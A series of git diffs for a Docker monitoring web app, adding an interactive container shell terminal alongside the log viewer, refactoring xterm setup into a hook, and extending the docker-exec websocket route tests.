+      handler.message(peer, { text: () => 'after-error' });
+      expect(upstream.send).not.toHaveBeenCalled();
+    });
+  });
+});

--- a/server/routes/api/docker-exec/__tests__/[containerId].test.ts
+++ b/server/routes/api/docker-exec/__tests__/[containerId].test.ts
@@ -1,8 +1,7 @@
 import { describe, it, expect, mock, beforeEach, beforeAll, afterAll } from 'bun:test';
 
-// Mock all the dynamic-imported modules at module-graph boundaries.
-// The route uses await import() so each mock must use the exact path the
-// route imports from (relative paths in the route file, NOT @/ aliases).
+// The route uses await import() so each mock must match the exact path the
+// route imports from (relative paths, NOT @/ aliases).
 const mockFindByName = mock(async (_: string) => null as null | { name: string; agentUrl: string });
 const mockGetPrivateKeyForHost = mock(async (_: string) => null as null | object);
 const mockSignAgentJwt = mock(async () => 'fake.jwt.token');
@@ -37,7 +36,7 @@ mock.module('../../../../../src/lib/crypto/agent-jwt', () => ({
   signAgentJwt: mockSignAgentJwt,
 }));
 
-// Capture every constructed mock WebSocket so tests can drive .onmessage etc.
+// Indexed by construction order so tests can fire .onmessage, .onclose, .onerror.
 interface ConstructedWs {
   url: string;
   init: unknown;
@@ -47,7 +46,7 @@ interface ConstructedWs {
   close: ReturnType<typeof mock>;
   onmessage: ((e: { data: unknown }) => void) | null;
   onclose: ((e: { code: number; reason: string }) => void) | null;
-  onerror: (() => void) | null;
+  onerror: ((e: Event) => void) | null;
 }
 const constructedWebSockets: ConstructedWs[] = [];
 
@@ -61,7 +60,7 @@ class MockWebSocket implements ConstructedWs {
   close = mock(() => { this.readyState = MockWebSocket.CLOSED; });
   onmessage: ((e: { data: unknown }) => void) | null = null;
   onclose: ((e: { code: number; reason: string }) => void) | null = null;
-  onerror: (() => void) | null = null;
+  onerror: ((e: Event) => void) | null = null;
   constructor(public url: string, public init: unknown) {
     constructedWebSockets.push(this);
   }
@@ -69,7 +68,6 @@ class MockWebSocket implements ConstructedWs {
 
 beforeAll(() => {
   (globalThis as unknown as { WebSocket: typeof MockWebSocket }).WebSocket = MockWebSocket;
-  // Silence the route's console.error during expected error paths.
   console.error = mock(() => {});
 });
 
@@ -87,7 +85,7 @@ interface HandlerHooks {
   open: (peer: FakePeer) => Promise<void>;
   message: (peer: FakePeer, msg: FakeMessage) => void;
   close: (peer: FakePeer) => void;
-  error: (peer: FakePeer) => void;
+  error: (peer: FakePeer, err?: Error) => void;
 }
 const exported = handlerModule.default as unknown as (event: unknown) => Response & { crossws: HandlerHooks };
 const handler: HandlerHooks = exported({} as unknown).crossws;
@@ -212,7 +210,6 @@ describe('docker-exec websocket route', () => {
     it('drops messages when no upstream entry exists for the peer', () => {
       const peer = makePeer({ url: 'http://localhost:3000/api/docker-exec/abc123?host=server1', id: 'no-upstream' });
       const msg: FakeMessage = { text: () => 'whatever' };
-      // Should not throw and obviously cannot send anywhere.
       expect(() => handler.message(peer, msg)).not.toThrow();
     });
 
@@ -276,6 +273,106 @@ describe('docker-exec websocket route', () => {
 
       handler.message(peer, { text: () => 'after-error' });
       expect(upstream.send).not.toHaveBeenCalled();
+    });
+
+    it('logs the peer error message when an error argument is provided', async () => {
+      mockFindByName.mockImplementation(async () => ({ name: 'server1', agentUrl: 'http://agent.local:9000' }));
+      mockGetPrivateKeyForHost.mockImplementation(async () => ({}));
+      const peer = makePeer({ url: 'http://localhost:3000/api/docker-exec/abc123?host=server1', id: 'peer-err-log' });
+      await handler.open(peer);
+
+      const wsErr = Object.assign(new Error('peer disconnected unexpectedly'), { type: 'WSError' });
+      handler.error(peer, wsErr);
+
+      expect(console.error).toHaveBeenCalled();
+    });
+  });
+
+  describe('agentWs event handlers', () => {
+    async function openAndGetUpstream(): Promise<{ peer: FakePeer; upstream: ConstructedWs }> {
+      mockFindByName.mockImplementation(async () => ({ name: 'server1', agentUrl: 'http://agent.local:9000' }));
+      mockGetPrivateKeyForHost.mockImplementation(async () => ({}));
+      const peer = makePeer({ url: 'http://localhost:3000/api/docker-exec/abc123?host=server1' });
+      await handler.open(peer);
+      return { peer, upstream: constructedWebSockets[0]! };
+    }
+
+    it('forwards ArrayBuffer from agent as Uint8Array to peer.send', async () => {
+      const { peer, upstream } = await openAndGetUpstream();
+      upstream.onmessage?.({ data: new ArrayBuffer(4) });
+      const arg = peer.send.mock.calls[0]?.[0];
+      expect(arg).toBeInstanceOf(Uint8Array);
+      expect((arg as Uint8Array).length).toBe(4);
+    });
+
+    it('forwards non-ArrayBuffer data from agent directly to peer.send', async () => {
+      const { peer, upstream } = await openAndGetUpstream();
+      upstream.onmessage?.({ data: 'hello from agent' });
+      expect(peer.send).toHaveBeenCalledWith('hello from agent');
+    });
+
+    it('closes agentWs with 1001 and logs when peer.send throws', async () => {
+      const { upstream } = await openAndGetUpstream();
+      const throwingPeer = makePeer({ url: 'http://localhost:3000/api/docker-exec/abc123?host=server1', id: 'peer-throw' });
+      throwingPeer.send = mock(() => { throw new Error('peer gone'); });
+      // Re-open with the throwing peer to register it under a new peer.id.
+      constructedWebSockets.length = 0;
+      await handler.open(throwingPeer);
+      const throwingUpstream = constructedWebSockets[0]!;
+
+      throwingUpstream.onmessage?.({ data: new ArrayBuffer(4) });
+
+      expect(throwingUpstream.close).toHaveBeenCalledWith(1001);
+      expect(console.error).toHaveBeenCalled();
+      // Suppress unused-variable warning from outer upstream.
+      void upstream;
+    });
+
+    it('propagates agentWs close code and reason to peer.close', async () => {
+      const { peer, upstream } = await openAndGetUpstream();
+      upstream.onclose?.({ code: 1011, reason: 'Shell exited' });
+      expect(peer.close).toHaveBeenCalledWith(1011, 'Shell exited');
+    });
+
+    it('closes peer with 1011 "Agent connection error" and logs when agentWs fires onerror', async () => {
+      const { peer, upstream } = await openAndGetUpstream();
+      const errEvent = Object.assign(new Event('error'), { error: new Error('connection refused') });
+      upstream.onerror?.(errEvent);
+      expect(peer.close).toHaveBeenCalledWith(1011, 'Agent connection error');
+      expect(console.error).toHaveBeenCalled();
+    });
+  });
+
+  describe('clampDim via open query params', () => {
+    async function openWithDims(cols: string | null, rows: string | null): Promise<string> {
+      mockFindByName.mockImplementation(async () => ({ name: 'server1', agentUrl: 'http://agent.local:9000' }));
+      mockGetPrivateKeyForHost.mockImplementation(async () => ({}));
+      const params = new URLSearchParams({ host: 'server1' });
+      if (cols !== null) params.set('cols', cols);
+      if (rows !== null) params.set('rows', rows);
+      const peer = makePeer({ url: `http://localhost:3000/api/docker-exec/abc123?${params.toString()}` });
+      await handler.open(peer);
+      return constructedWebSockets[0]!.url;
+    }
+
+    it('clamps cols=0 to 1 in agent URL', async () => {
+      const url = await openWithDims('0', '24');
+      expect(url).toContain('cols=1');
+    });
+
+    it('clamps cols=501 to 500 in agent URL', async () => {
+      const url = await openWithDims('501', '24');
+      expect(url).toContain('cols=500');
+    });
+
+    it('falls back to cols=80 when cols is NaN (non-numeric string)', async () => {
+      const url = await openWithDims('abc', '24');
+      expect(url).toContain('cols=80');
+    });
+
+    it('falls back to cols=80 when cols param is absent', async () => {
+      const url = await openWithDims(null, '24');
+      expect(url).toContain('cols=80');
     });
   });
 });

--- a/src/components/docker/ContainerDetailPanel.tsx
+++ b/src/components/docker/ContainerDetailPanel.tsx
@@ -2,7 +2,7 @@ import { memo, useMemo } from 'react';
 import { Divider } from '@mui/material';
 import { formatAsPercent, formatBitsSIUnits } from '@/formatters/metrics';
 import DualSeriesChart from '@/components/docker/DualSeriesChart';
-import ContainerLogViewer from '@/components/docker/ContainerLogViewer';
+import ContainerLogsTerminalPanel from '@/components/docker/ContainerLogsTerminalPanel';
 import type { ChartDataPoint } from '@/hooks/useContainerChartData';
 import type { DockerInventorySnapshotContainer } from '@/types/docker-inventory';
 
@@ -118,7 +118,7 @@ export default memo(function ContainerDetailPanel({
           />
         </div>
         <div className="min-h-0 lg:col-start-2 lg:row-start-1 lg:row-span-2">
-          <ContainerLogViewer containerId={containerId} host={host} />
+          <ContainerLogsTerminalPanel containerId={containerId} host={host} inventory={inventory} />
         </div>
       </div>
     </div>

--- a/src/components/docker/ContainerLogViewer.tsx
+++ b/src/components/docker/ContainerLogViewer.tsx
@@ -1,9 +1,7 @@
-import { memo, useEffect, useRef, useState } from 'react';
+import { memo, useEffect, useState } from 'react';
 import { Paper, Skeleton, Typography } from '@mui/material';
-import type { Terminal as TerminalType } from '@xterm/xterm';
+import { useXtermSetup } from '@/hooks/useXtermSetup';
 import { useContainerLogs } from '@/hooks/useContainerLogs';
-import { getCssVar } from '@/lib/charts/css-vars';
-import { RESIZE_DEBOUNCE_MS } from '@/lib/constants/ui-timing';
 
 interface ContainerLogViewerProps {
   containerId: string;
@@ -14,117 +12,8 @@ export default memo(function ContainerLogViewer({
   containerId,
   host,
 }: ContainerLogViewerProps) {
-  const containerRef = useRef<HTMLDivElement>(null);
-  const [terminal, setTerminal] = useState<TerminalType | null>(null);
+  const { containerRef, terminal } = useXtermSetup({ disableStdin: true, convertEol: true });
   const [ready, setReady] = useState(false);
-  const terminalRef = useRef<TerminalType | null>(null);
-  const fitAddonRef = useRef<{ fit(): void } | null>(null);
-
-  // Dynamically import xterm.js (CJS modules - must be loaded at runtime, not statically)
-  useEffect(() => {
-    if (!containerRef.current) return;
-    let disposed = false;
-
-    void (async () => {
-      try {
-        const [xtermMod, fitMod] = await Promise.all([
-          import('@xterm/xterm'),
-          import('@xterm/addon-fit'),
-        ]);
-
-        // Also load the stylesheet
-        await import('@xterm/xterm/css/xterm.css');
-
-        if (disposed) return;
-
-        // Handle CJS default export (bun) vs ESM named export (Vite)
-        const xtermAny = xtermMod as Record<string, unknown>;
-        const Terminal = (xtermAny.Terminal ?? (xtermAny.default as Record<string, unknown>).Terminal) as typeof TerminalType;
-        const fitAny = fitMod as Record<string, unknown>;
-        const FitAddon = (fitAny.FitAddon ?? (fitAny.default as Record<string, unknown>).FitAddon) as new () => import('@xterm/xterm').ITerminalAddon & { fit(): void };
-
-        const bg = getCssVar('--mui-palette-background-chartBg');
-        const fg = getCssVar('--chart-text-muted');
-
-        const term = new Terminal({
-          disableStdin: true,
-          convertEol: true,
-          fontSize: 12,
-          fontFamily: 'monospace',
-          scrollback: 2000,
-          theme: {
-            ...(bg && { background: bg }),
-            ...(fg && { foreground: fg }),
-          },
-        });
-
-        const fitAddon = new FitAddon();
-        fitAddonRef.current = fitAddon;
-        term.loadAddon(fitAddon);
-        term.open(containerRef.current!);
-
-        requestAnimationFrame(() => {
-          try {
-            fitAddon.fit();
-          } catch {
-            // Container may not be visible yet
-          }
-        });
-
-        terminalRef.current = term;
-        setTerminal(term);
-      } catch (err) {
-        console.error('Failed to initialize terminal:', err);
-      }
-    })();
-
-    return () => {
-      disposed = true;
-      fitAddonRef.current = null;
-      terminalRef.current?.dispose();
-      terminalRef.current = null;
-    };
-  }, []);
-
-  // Sync terminal theme when the color scheme changes (xterm uses a canvas renderer,
-  // so CSS variable changes don't apply automatically)
-  useEffect(() => {
-    if (!terminal) return;
-
-    const root = document.documentElement;
-    const applyTheme = () => {
-      const bg = getCssVar('--mui-palette-background-chartBg');
-      const fg = getCssVar('--chart-text-muted');
-      terminal.options.theme = {
-        ...(bg && { background: bg }),
-        ...(fg && { foreground: fg }),
-      };
-    };
-
-    const observer = new MutationObserver(applyTheme);
-    observer.observe(root, { attributes: true, attributeFilter: ['data-color-scheme'] });
-    return () => observer.disconnect();
-  }, [terminal]);
-
-  // Re-fit on container resize (debounced to avoid rapid reflows during Collapse animation)
-  useEffect(() => {
-    if (!containerRef.current || !fitAddonRef.current) return;
-    let timer: ReturnType<typeof setTimeout> | undefined;
-
-    const observer = new ResizeObserver(() => {
-      if (timer !== undefined) clearTimeout(timer);
-      timer = setTimeout(() => {
-        try {
-          fitAddonRef.current?.fit();
-        } catch {
-          // Ignore fit errors during layout transitions
-        }
-      }, RESIZE_DEBOUNCE_MS);
-    });
-
-    observer.observe(containerRef.current);
-    return () => { if (timer !== undefined) clearTimeout(timer); observer.disconnect(); };
-  }, [terminal]);
 
   const { isConnected, error } = useContainerLogs({
     containerId,

--- a/src/components/docker/ContainerLogViewer.tsx
+++ b/src/components/docker/ContainerLogViewer.tsx
@@ -12,14 +12,17 @@ export default memo(function ContainerLogViewer({
   containerId,
   host,
 }: ContainerLogViewerProps) {
-  const { containerRef, terminal } = useXtermSetup({ disableStdin: true, convertEol: true });
+  const { containerRef, terminal, error: setupError } = useXtermSetup({ disableStdin: true, convertEol: true });
   const [ready, setReady] = useState(false);
 
-  const { isConnected, error } = useContainerLogs({
+  const { isConnected, error: logsError } = useContainerLogs({
     containerId,
     host,
     terminal,
   });
+
+  // Surface either failure path: xterm bootstrap (dynamic import) or logs stream.
+  const error = setupError ?? logsError;
 
   // Mark ready once connected so xterm has painted its first content
   useEffect(() => {

--- a/src/components/docker/ContainerLogsTerminalPanel.tsx
+++ b/src/components/docker/ContainerLogsTerminalPanel.tsx
@@ -1,0 +1,108 @@
+import { memo, useState } from 'react';
+import Tab from '@mui/material/Tab';
+import Tabs from '@mui/material/Tabs';
+import Select from '@mui/material/Select';
+import MenuItem from '@mui/material/MenuItem';
+import FormControl from '@mui/material/FormControl';
+import InputLabel from '@mui/material/InputLabel';
+import type { SelectChangeEvent } from '@mui/material/Select';
+import ContainerLogViewer from '@/components/docker/ContainerLogViewer';
+import ContainerTerminal from '@/components/docker/ContainerTerminal';
+import { useDockerSettings } from '@/hooks/useDockerSettings';
+import type { DockerInventorySnapshotContainer } from '@/types/docker-inventory';
+
+interface ContainerLogsTerminalPanelProps {
+  containerId: string;
+  host: string;
+  inventory: DockerInventorySnapshotContainer;
+}
+
+const SHELL_OPTIONS = ['bash', 'sh', 'ash', 'zsh'] as const;
+
+export default memo(function ContainerLogsTerminalPanel({
+  containerId,
+  host,
+  inventory,
+}: ContainerLogsTerminalPanelProps) {
+  const [activeTab, setActiveTab] = useState<'logs' | 'terminal'>('logs');
+  const [terminalMounted, setTerminalMounted] = useState(false);
+
+  const { getContainerShell, setContainerShell } = useDockerSettings();
+
+  const isRunning = inventory.state === 'running';
+
+  // host/name is the shell preference key: survives container restarts (new containerId),
+  // same as how settings keys are scoped for per-container preferences.
+  const shellKey = `${host}/${inventory.name}`;
+  const savedShell = getContainerShell(shellKey);
+  const effectiveShell = savedShell ?? 'auto';
+
+  const handleTabChange = (_: React.SyntheticEvent, value: 'logs' | 'terminal') => {
+    setActiveTab(value);
+    if (value === 'terminal' && !terminalMounted) {
+      setTerminalMounted(true);
+    }
+  };
+
+  const handleShellChange = (e: SelectChangeEvent) => {
+    setContainerShell(shellKey, e.target.value);
+  };
+
+  // Terminal is frozen (stdin disabled, overlay shown) when the container stops
+  // after a session is already active. The terminal stays mounted so the output
+  // buffer is preserved and the user can still scroll through history.
+  const frozen = !isRunning;
+
+  return (
+    <div className="flex flex-col h-full min-h-0">
+      <div className="flex items-center gap-2 px-1 border-b border-[var(--mui-palette-divider)]">
+        <Tabs
+          value={activeTab}
+          onChange={handleTabChange}
+          className="!min-h-0"
+        >
+          <Tab value="logs" label="Logs" className="!min-h-0 !py-2 !text-xs" />
+          <Tab
+            value="terminal"
+            label="Terminal"
+            disabled={!isRunning && !terminalMounted}
+            className="!min-h-0 !py-2 !text-xs"
+          />
+        </Tabs>
+        {activeTab === 'terminal' && (
+          <FormControl size="small" className="ml-auto min-w-[90px]">
+            <InputLabel id="shell-select-label" className="!text-xs">Shell</InputLabel>
+            <Select
+              labelId="shell-select-label"
+              label="Shell"
+              value={effectiveShell === 'auto' ? '' : effectiveShell}
+              onChange={handleShellChange}
+              displayEmpty
+              renderValue={(v) => (v as string) || 'auto'}
+              className="!text-xs"
+            >
+              {SHELL_OPTIONS.map((s) => (
+                <MenuItem key={s} value={s} className="text-xs">{s}</MenuItem>
+              ))}
+            </Select>
+          </FormControl>
+        )}
+      </div>
+      <div className="flex-1 min-h-0 relative">
+        <div className={activeTab === 'logs' ? 'h-full' : 'hidden'}>
+          <ContainerLogViewer containerId={containerId} host={host} />
+        </div>
+        {terminalMounted && (
+          <div className={activeTab === 'terminal' ? 'h-full' : 'hidden'}>
+            <ContainerTerminal
+              containerId={containerId}
+              host={host}
+              shell={effectiveShell}
+              frozen={frozen}
+            />
+          </div>
+        )}
+      </div>
+    </div>
+  );
+});

--- a/src/components/docker/ContainerLogsTerminalPanel.tsx
+++ b/src/components/docker/ContainerLogsTerminalPanel.tsx
@@ -35,7 +35,8 @@ export default memo(function ContainerLogsTerminalPanel({
   // same as how settings keys are scoped for per-container preferences.
   const shellKey = `${host}/${inventory.name}`;
   const savedShell = getContainerShell(shellKey);
-  const effectiveShell = savedShell ?? 'auto';
+  // Treat undefined (never set) and '' (explicitly reset to auto) the same way
+  const effectiveShell = (savedShell === undefined || savedShell === '' || savedShell === 'auto') ? 'auto' : savedShell;
 
   const handleTabChange = (_: React.SyntheticEvent, value: 'logs' | 'terminal') => {
     setActiveTab(value);
@@ -81,6 +82,7 @@ export default memo(function ContainerLogsTerminalPanel({
               renderValue={(v) => (v as string) || 'auto'}
               className="!text-xs"
             >
+              <MenuItem value="" className="text-xs">auto</MenuItem>
               {SHELL_OPTIONS.map((s) => (
                 <MenuItem key={s} value={s} className="text-xs">{s}</MenuItem>
               ))}

--- a/src/components/docker/ContainerLogsTerminalPanel.tsx
+++ b/src/components/docker/ContainerLogsTerminalPanel.tsx
@@ -65,19 +65,19 @@ export default memo(function ContainerLogsTerminalPanel({
         <Tabs
           value={activeTab}
           onChange={handleTabChange}
-          className="!min-h-0"
+          className="min-h-0!"
         >
-          <Tab value="logs" label="Logs" className="!min-h-0 !py-2 !text-xs" />
+          <Tab value="logs" label="Logs" className="min-h-0! py-2! text-xs!" />
           <Tab
             value="terminal"
             label="Terminal"
             disabled={!isRunning && !terminalMounted}
-            className="!min-h-0 !py-2 !text-xs"
+            className="min-h-0! py-2! text-xs!"
           />
         </Tabs>
         {activeTab === 'terminal' && (
           <FormControl size="small" className="ml-auto min-w-[90px]">
-            <InputLabel id="shell-select-label" shrink className="!text-xs">Shell</InputLabel>
+            <InputLabel id="shell-select-label" shrink className="text-xs!">Shell</InputLabel>
             <Select
               labelId="shell-select-label"
               label="Shell"
@@ -93,11 +93,11 @@ export default memo(function ContainerLogsTerminalPanel({
                 return (
                   <span className="inline-flex items-center gap-1.5">
                     auto
-                    <CircularProgress size={10} thickness={6} className="!text-[var(--mui-palette-text-secondary)]" />
+                    <CircularProgress size={10} thickness={6} className="text-[var(--mui-palette-text-secondary)]!" />
                   </span>
                 );
               }}
-              className="!text-xs"
+              className="text-xs!"
             >
               <MenuItem value="" className="text-xs">auto</MenuItem>
               {SHELL_OPTIONS.map((s) => (

--- a/src/components/docker/ContainerLogsTerminalPanel.tsx
+++ b/src/components/docker/ContainerLogsTerminalPanel.tsx
@@ -72,7 +72,7 @@ export default memo(function ContainerLogsTerminalPanel({
         </Tabs>
         {activeTab === 'terminal' && (
           <FormControl size="small" className="ml-auto min-w-[90px]">
-            <InputLabel id="shell-select-label" className="!text-xs">Shell</InputLabel>
+            <InputLabel id="shell-select-label" shrink className="!text-xs">Shell</InputLabel>
             <Select
               labelId="shell-select-label"
               label="Shell"

--- a/src/components/docker/ContainerLogsTerminalPanel.tsx
+++ b/src/components/docker/ContainerLogsTerminalPanel.tsx
@@ -1,10 +1,11 @@
-import { memo, useState } from 'react';
+import { memo, useCallback, useState } from 'react';
 import Tab from '@mui/material/Tab';
 import Tabs from '@mui/material/Tabs';
 import Select from '@mui/material/Select';
 import MenuItem from '@mui/material/MenuItem';
 import FormControl from '@mui/material/FormControl';
 import InputLabel from '@mui/material/InputLabel';
+import CircularProgress from '@mui/material/CircularProgress';
 import type { SelectChangeEvent } from '@mui/material/Select';
 import ContainerLogViewer from '@/components/docker/ContainerLogViewer';
 import ContainerTerminal from '@/components/docker/ContainerTerminal';
@@ -26,6 +27,7 @@ export default memo(function ContainerLogsTerminalPanel({
 }: ContainerLogsTerminalPanelProps) {
   const [activeTab, setActiveTab] = useState<'logs' | 'terminal'>('logs');
   const [terminalMounted, setTerminalMounted] = useState(false);
+  const [resolvedShell, setResolvedShell] = useState<string | undefined>(undefined);
 
   const { getContainerShell, setContainerShell } = useDockerSettings();
 
@@ -47,7 +49,10 @@ export default memo(function ContainerLogsTerminalPanel({
 
   const handleShellChange = (e: SelectChangeEvent) => {
     setContainerShell(shellKey, e.target.value);
+    setResolvedShell(undefined);
   };
+
+  const handleShellResolved = useCallback((s: string) => setResolvedShell(s), []);
 
   // Terminal is frozen (stdin disabled, overlay shown) when the container stops
   // after a session is already active. The terminal stays mounted so the output
@@ -79,7 +84,19 @@ export default memo(function ContainerLogsTerminalPanel({
               value={effectiveShell === 'auto' ? '' : effectiveShell}
               onChange={handleShellChange}
               displayEmpty
-              renderValue={(v) => (v as string) || 'auto'}
+              renderValue={(v) => {
+                const setting = (v as string) || 'auto';
+                if (setting !== 'auto') return setting;
+                if (resolvedShell) return `auto (${resolvedShell})`;
+                // Probe in flight: show spinner alongside `auto` until the
+                // agent's `{type:'shell'}` control frame resolves.
+                return (
+                  <span className="inline-flex items-center gap-1.5">
+                    auto
+                    <CircularProgress size={10} thickness={6} className="!text-[var(--mui-palette-text-secondary)]" />
+                  </span>
+                );
+              }}
               className="!text-xs"
             >
               <MenuItem value="" className="text-xs">auto</MenuItem>
@@ -101,6 +118,7 @@ export default memo(function ContainerLogsTerminalPanel({
               host={host}
               shell={effectiveShell}
               frozen={frozen}
+              onShellResolved={handleShellResolved}
             />
           </div>
         )}

--- a/src/components/docker/ContainerTerminal.tsx
+++ b/src/components/docker/ContainerTerminal.tsx
@@ -1,0 +1,84 @@
+import { memo, useEffect, useState } from 'react';
+import { Paper, Skeleton, Typography } from '@mui/material';
+import { useXtermSetup } from '@/hooks/useXtermSetup';
+import { useContainerTerminal } from '@/hooks/useContainerTerminal';
+
+interface ContainerTerminalProps {
+  containerId: string;
+  host: string;
+  shell: string;
+  frozen: boolean;
+}
+
+export default memo(function ContainerTerminal({
+  containerId,
+  host,
+  shell,
+  frozen,
+}: ContainerTerminalProps) {
+  const { containerRef, terminal } = useXtermSetup({
+    disableStdin: false,
+    cursorBlink: true,
+    convertEol: true,
+  });
+  const [ready, setReady] = useState(false);
+
+  const { isConnected, error } = useContainerTerminal({
+    containerId,
+    host,
+    shell,
+    terminal,
+    enabled: !frozen,
+  });
+
+  // Mark ready once connected so xterm has painted its first content
+  useEffect(() => {
+    if (isConnected && terminal) setReady(true);
+  }, [isConnected, terminal]);
+
+  // Disable stdin when frozen so keystrokes don't queue up while container is stopped
+  useEffect(() => {
+    if (!terminal) return;
+    terminal.options.disableStdin = frozen;
+  }, [terminal, frozen]);
+
+  const showSkeleton = !ready && !error && !frozen;
+
+  return (
+    <Paper
+      elevation={0}
+      className="relative rounded-sm !bg-[var(--mui-palette-background-chartBg)] h-full min-h-0 flex flex-col overflow-hidden"
+    >
+      <div
+        ref={containerRef}
+        className={`flex-1 px-2 pb-2 min-h-0 transition-opacity duration-300 ${showSkeleton ? 'opacity-0' : 'opacity-100'}`}
+      />
+      {showSkeleton && (
+        <div className="absolute inset-0 px-3 pb-3 flex flex-col gap-1 pt-2">
+          {Array.from({ length: 14 }, (_, i) => (
+            <Skeleton
+              key={i}
+              variant="text"
+              width={`${45 + ((i * 37) % 50)}%`}
+              className="!bg-[var(--mui-palette-action-hover)] !text-xs"
+            />
+          ))}
+        </div>
+      )}
+      {frozen && (
+        <div className="absolute inset-0 flex items-center justify-center bg-black/40 rounded-sm">
+          <Typography variant="body2" className="text-[var(--mui-palette-text-disabled)]">
+            Container stopped
+          </Typography>
+        </div>
+      )}
+      {error && !frozen && (
+        <div className="absolute inset-0 flex items-center justify-center bg-black/30 rounded-sm">
+          <Typography variant="body2" color="error">
+            {error.message}
+          </Typography>
+        </div>
+      )}
+    </Paper>
+  );
+});

--- a/src/components/docker/ContainerTerminal.tsx
+++ b/src/components/docker/ContainerTerminal.tsx
@@ -56,7 +56,7 @@ export default memo(function ContainerTerminal({
   return (
     <Paper
       elevation={0}
-      className="relative rounded-sm !bg-[var(--mui-palette-background-chartBg)] h-full min-h-0 flex flex-col overflow-hidden"
+      className="relative rounded-sm bg-(--mui-palette-background-chartBg)! h-full min-h-0 flex flex-col overflow-hidden"
     >
       <div
         ref={containerRef}
@@ -69,7 +69,7 @@ export default memo(function ContainerTerminal({
               key={i}
               variant="text"
               width={`${45 + ((i * 37) % 50)}%`}
-              className="!bg-[var(--mui-palette-action-hover)] !text-xs"
+              className="bg-(--mui-palette-action-hover)! text-xs!"
             />
           ))}
         </div>

--- a/src/components/docker/ContainerTerminal.tsx
+++ b/src/components/docker/ContainerTerminal.tsx
@@ -1,5 +1,5 @@
 import { memo, useEffect, useState } from 'react';
-import { Paper, Skeleton, Typography } from '@mui/material';
+import { Button, Paper, Skeleton, Typography } from '@mui/material';
 import { useXtermSetup } from '@/hooks/useXtermSetup';
 import { useContainerTerminal } from '@/hooks/useContainerTerminal';
 
@@ -8,6 +8,8 @@ interface ContainerTerminalProps {
   host: string;
   shell: string;
   frozen: boolean;
+  /** Called when the agent reports which shell it actually spawned (for `auto`). */
+  onShellResolved?: (shell: string) => void;
 }
 
 export default memo(function ContainerTerminal({
@@ -15,6 +17,7 @@ export default memo(function ContainerTerminal({
   host,
   shell,
   frozen,
+  onShellResolved,
 }: ContainerTerminalProps) {
   const { containerRef, terminal } = useXtermSetup({
     disableStdin: false,
@@ -23,13 +26,17 @@ export default memo(function ContainerTerminal({
   });
   const [ready, setReady] = useState(false);
 
-  const { isConnected, error } = useContainerTerminal({
+  const { isConnected, error, resolvedShell, sessionEnded, reconnect } = useContainerTerminal({
     containerId,
     host,
     shell,
     terminal,
     enabled: !frozen,
   });
+
+  useEffect(() => {
+    if (resolvedShell && onShellResolved) onShellResolved(resolvedShell);
+  }, [resolvedShell, onShellResolved]);
 
   // Mark ready once connected so xterm has painted its first content
   useEffect(() => {
@@ -77,6 +84,16 @@ export default memo(function ContainerTerminal({
           <Typography variant="body2" color="error">
             {error.message}
           </Typography>
+        </div>
+      )}
+      {sessionEnded && !frozen && !error && (
+        <div className="absolute inset-0 flex flex-col items-center justify-center bg-black/40 rounded-sm gap-3">
+          <Typography variant="body2" className="text-[var(--mui-palette-text-disabled)]">
+            Session ended
+          </Typography>
+          <Button size="small" variant="outlined" onClick={reconnect}>
+            Reconnect
+          </Button>
         </div>
       )}
     </Paper>

--- a/src/components/docker/ContainerTerminal.tsx
+++ b/src/components/docker/ContainerTerminal.tsx
@@ -19,14 +19,14 @@ export default memo(function ContainerTerminal({
   frozen,
   onShellResolved,
 }: ContainerTerminalProps) {
-  const { containerRef, terminal } = useXtermSetup({
+  const { containerRef, terminal, error: setupError } = useXtermSetup({
     disableStdin: false,
     cursorBlink: true,
     convertEol: true,
   });
   const [ready, setReady] = useState(false);
 
-  const { isConnected, error, resolvedShell, sessionEnded, reconnect } = useContainerTerminal({
+  const { isConnected, error: wsError, resolvedShell, sessionEnded, reconnect } = useContainerTerminal({
     containerId,
     host,
     shell,
@@ -34,16 +34,18 @@ export default memo(function ContainerTerminal({
     enabled: !frozen,
   });
 
+  // Surface either failure path: xterm bootstrap (dynamic import) or WS lifecycle.
+  const error = setupError ?? wsError;
+
   useEffect(() => {
     if (resolvedShell && onShellResolved) onShellResolved(resolvedShell);
   }, [resolvedShell, onShellResolved]);
 
-  // Mark ready once connected so xterm has painted its first content
   useEffect(() => {
     if (isConnected && terminal) setReady(true);
   }, [isConnected, terminal]);
 
-  // Disable stdin when frozen so keystrokes don't queue up while container is stopped
+  // Block input while the container is stopped
   useEffect(() => {
     if (!terminal) return;
     terminal.options.disableStdin = frozen;

--- a/src/components/docker/__tests__/ContainerDetailPanel.test.tsx
+++ b/src/components/docker/__tests__/ContainerDetailPanel.test.tsx
@@ -13,28 +13,8 @@ mock.module('@/components/docker/DualSeriesChartRenderer', () => ({
   ),
 }));
 
-mock.module('@xterm/xterm', () => ({
-  default: {
-    Terminal: class MockTerminal {
-      loadAddon = mock(() => {});
-      open = mock(() => {});
-      dispose = mock(() => {});
-      writeln = mock(() => {});
-    },
-  },
-}));
-mock.module('@xterm/addon-fit', () => ({
-  default: {
-    FitAddon: class MockFitAddon {
-      fit = mock(() => {});
-      dispose = mock(() => {});
-    },
-  },
-}));
-mock.module('@xterm/xterm/css/xterm.css', () => ({}));
-
-mock.module('@/hooks/useContainerLogs', () => ({
-  useContainerLogs: () => ({ isConnected: true, error: null }),
+mock.module('@/components/docker/ContainerLogsTerminalPanel', () => ({
+  default: () => <div data-testid="logs-terminal-panel" />,
 }));
 
 const { default: ContainerDetailPanel } = await import('../ContainerDetailPanel');
@@ -98,9 +78,9 @@ describe('ContainerDetailPanel', () => {
     screen.getByText('Network I/O');
   });
 
-  it('renders the log viewer', () => {
+  it('renders the logs/terminal panel', () => {
     renderPanel();
-    screen.getByText('Logs');
+    screen.getByTestId('logs-terminal-panel');
   });
 
   it('renders two chart instances', () => {
@@ -120,7 +100,7 @@ describe('ContainerDetailPanel', () => {
   it('renders with empty data points', () => {
     renderPanel({ dataPoints: [] });
     screen.getByText('CPU & Memory');
-    screen.getByText('Logs');
+    screen.getByTestId('logs-terminal-panel');
   });
 
   it('shows exit metadata for an exited container', () => {

--- a/src/components/docker/__tests__/ContainerDetailPanel.test.tsx
+++ b/src/components/docker/__tests__/ContainerDetailPanel.test.tsx
@@ -17,7 +17,7 @@ mock.module('@/components/docker/ContainerLogsTerminalPanel', () => ({
   default: () => <div data-testid="logs-terminal-panel" />,
 }));
 
-const { default: ContainerDetailPanel } = await import('../ContainerDetailPanel');
+const { default: ContainerDetailPanel } = await import('@/components/docker/ContainerDetailPanel');
 const { createStore, Provider } = await import('jotai');
 
 const sampleDataPoints = [

